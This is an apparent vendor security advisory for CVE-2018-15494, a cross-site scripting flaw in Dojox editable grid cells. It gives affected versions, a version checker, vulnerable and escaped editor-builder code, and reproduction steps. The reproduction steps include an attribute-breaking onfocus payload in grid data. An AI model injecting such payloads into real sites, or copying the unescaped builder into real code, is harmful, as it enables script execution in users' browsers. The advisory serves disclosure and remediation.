CVE-2018-15494
This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs.
Overview
Dojox (or “Dojo Toolkit”) is a collection of optional, extended, and experimental modules for the Dojo Toolkit that provide additional UI widgets, utilities, and advanced features beyond the core Dojo libraries.
A critical severity Cross-Site Scripting (XSS) vulnerability (CVE-2018-15494) has been identified in Dojox. The formatting logic for editable grid cells allows attackers to bypass content restrictions and inject HTML attributes and JavaScript event handlers, leading to arbitrary code execution.
Per OWASP: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
Details
Module Info
- Product: Dojo
- Affected packages: dojox
- Affected versions: <1.10.10, >=1.11.0-rc1 <1.11.6, >=1.12.0-rc1 <1.12.4, >=1.13.0 <1.14.0
- GitHub repository: https://github.com/dojo/dojox
- Published packages: https://www.npmjs.com/package/dojox
- Package manager: npm
- Fixed in: NES for Dojo v1.7.4, OSS v1.10.10, OSS v1.11.6, OSS v1.12.4, OSS v1.14.0
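The affected ranges above are the practical test for whether a deployed copy of dojox needs attention. The following is an added example, not part of the advisory or of the Dojox project, that checks a version string against exactly those open-source ranges. The comparator is a deliberately small subset of semver (numeric triple plus an optional prerelease tag such as rc1), which is all these ranges require; it does not cover the separately versioned HeroDevs NES builds, for which the page lists v1.7.4 as fixed.

```javascript
// Added example: is this dojox version inside the affected ranges from the advisory?
// Ranges are copied from the "Affected versions" entry above; the comparison logic
// is a minimal semver subset written for this example and is an assumption, not a
// library API.

const AFFECTED_RANGES = [
  { lt: '1.10.10' },
  { gte: '1.11.0-rc1', lt: '1.11.6' },
  { gte: '1.12.0-rc1', lt: '1.12.4' },
  { gte: '1.13.0', lt: '1.14.0' },
];

// Parse "MAJOR.MINOR.PATCH[-prerelease]" into numeric parts and an optional tag.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.]+))?$/.exec(String(v).trim());
  if (!m) throw new Error('unparseable version: ' + v);
  return { nums: [Number(m[1]), Number(m[2]), Number(m[3])], pre: m[4] || null };
}

// Returns -1, 0 or 1. A prerelease sorts before the corresponding release
// (1.11.0-rc1 < 1.11.0); two prereleases on the same triple compare as strings,
// which is sufficient for the rcN tags used in the ranges above.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa.nums[i] !== pb.nums[i]) return pa.nums[i] < pb.nums[i] ? -1 : 1;
  }
  if (pa.pre === pb.pre) return 0;
  if (pa.pre === null) return 1;
  if (pb.pre === null) return -1;
  return pa.pre < pb.pre ? -1 : 1;
}

// True when the version falls inside any affected range (lower bound inclusive,
// upper bound exclusive, as the advisory's ">=" / "<" notation states).
function isAffected(version) {
  return AFFECTED_RANGES.some(r =>
    (r.gte === undefined || compareVersions(version, r.gte) >= 0) &&
    compareVersions(version, r.lt) < 0);
}

// Usage: constructed sample of versions an inventory scan might report.
for (const v of ['1.10.9', '1.10.10', '1.11.0-rc1', '1.12.3', '1.13.2', '1.14.0']) {
  console.log(v, isAffected(v) ? 'AFFECTED' : 'not affected');
}
```

Open-source 1.7.x releases fall under the "<1.10.10" range and report as affected, which matches the Mitigation section: that branch is end-of-life and only the NES build carries the fix.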
Vulnerability Info
This Critical-severity vulnerability affects Dojox versions below 1.14.0 that fall within the ranges listed above. See the affected versions for specific details.
Dojox grids support editable cells. The formatEditing method in dojox/grid/cells/_base.js builds the editor's <input> element by concatenating the cell value into its value attribute without escaping double quotes. A user-controlled value such as name" onfocus="alert(document.cookie)" x=" therefore closes the attribute early and yields executable HTML: <input value="name" onfocus="alert(document.cookie)" x="">. When a user clicks the cell to edit it, the input receives focus and the injected JavaScript executes.
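The root cause is ordinary attribute-context injection: a value is spliced into an HTML attribute without entity encoding. The block below is an added example, not code from the advisory or from dojox/grid/cells/_base.js, that places an unescaped editor builder modelled on the described bug next to a hardened one, and adds a small check a defender can run over rendered editor markup to spot attributes the builder never emitted. The builder functions, the attribute tokenizer and the expected-attribute list are assumptions made for the illustration; the sample value is the one used in the reproduction steps.

```javascript
// Added example: attribute-context injection in a cell editor, vulnerable and
// hardened forms side by side. Function names and markup are illustrative and
// are not the real Dojox implementation.

// Constructed sample: the payload from the advisory's reproduction steps.
const SAMPLE_NAME = 'John" onfocus="alert(\'XSS via CVE-2018-15494\')" x="';

// Vulnerable pattern: the cell value is concatenated straight into the attribute.
function buildEditorUnescaped(value) {
  return '<input class="dojoxGridInput" type="text" value="' + value + '">';
}

// Encode every character that can terminate or reshape an attribute value.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hardened pattern: same markup, value passed through escapeAttr first.
function buildEditorEscaped(value) {
  return '<input class="dojoxGridInput" type="text" value="' + escapeAttr(value) + '">';
}

// Minimal tokenizer returning the attribute names a browser would see on the
// first <input> tag. Assumes double-quoted attribute values, as the builders emit.
function attributeNames(html) {
  const tag = /<input\s([^>]*)>/.exec(html);
  if (!tag) return [];
  const names = [];
  const re = /([^\s=]+)(?:="([^"]*)")?/g;
  let m;
  while ((m = re.exec(tag[1])) !== null) names.push(m[1]);
  return names;
}

// Defender-side check: flag rendered editor markup whose attribute list contains
// anything beyond what the builder itself writes (e.g. an on* handler).
const EXPECTED_ATTRS = ['class', 'type', 'value'];
function hasInjectedAttributes(html) {
  return attributeNames(html).some(n => !EXPECTED_ATTRS.includes(n));
}

// Usage: the unescaped builder leaks onfocus and x as live attributes; the
// escaped builder keeps the whole payload inside the value attribute.
console.log(buildEditorUnescaped(SAMPLE_NAME), hasInjectedAttributes(buildEditorUnescaped(SAMPLE_NAME)));
console.log(buildEditorEscaped(SAMPLE_NAME), hasInjectedAttributes(buildEditorEscaped(SAMPLE_NAME)));
```

The escaping here uses the standard HTML attribute entities and illustrates the class of fix; it is not a reproduction of the upstream patch. In a real grid the same rule applies to every value interpolated into markup, not only the editor's value attribute.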
Steps To Reproduce
- Create a Dojo/Dojox application and set it up to use an editable grid.
- Set up the malicious data in a JavaScript object. This would represent user-controlled data.
<script>
  // Row 2 carries the user-controlled value that breaks out of the value attribute.
  var maliciousDataObj = {
    items: [
      { id: 1, name: 'Normal User', email: 'normal@example.com' },
      {
        id: 2,
        name: 'John" onfocus="alert(\'XSS via CVE-2018-15494\')" x="',
        email: 'john@example.com'
      }
    ]
  };
  // dojoConfig must be defined before dojo.js is loaded.
  dojoConfig = {
    async: false,
    parseOnLoad: true,
    isDebug: true
  };
</script>
- Associate the data with the editable grid.
<!-- Data store containing malicious payload in row 2's name field -->
<span
  data-dojo-type="dojo.data.ItemFileWriteStore"
  data-dojo-id="vulnStore"
  data-dojo-props="data:maliciousDataObj"
></span>
<!-- DataGrid with editable Name column - CVE-2018-15494 vulnerability occurs here -->
<table
  data-dojo-type="dojox.grid.DataGrid"
  data-dojo-id="vulnGrid"
  data-dojo-props="store:vulnStore,
                   query:{ id: '*' },
                   rowSelector:'20px',
                   autoHeight:true,
                   singleClickEdit:true"
  style="width: 500px"
>
  <thead>
    <tr>
      <th width="50px" field="id">ID</th>
      <!-- editable="true" enables editing mode which triggers the vulnerability -->
      <th width="200px" field="name" editable="true">
        Name (Click to Edit)
      </th>
      <th width="auto" field="email">Email</th>
    </tr>
  </thead>
</table>
- Clicking the Name cell of the second row opens the editor and triggers the XSS alert.
Mitigation
Dojox version 1.7.x is End-of-Life and will not receive any updates to address this issue. For more information see the Dojo website announcement.
Users of the affected components should apply one of the following mitigations:
- Upgrade affected applications to a fixed version of Dojox and Dojo.
- Leverage a commercial support partner like HeroDevs for post-EOL security support.
Credits
- Moritz Bechler of SySS GmbH (finder)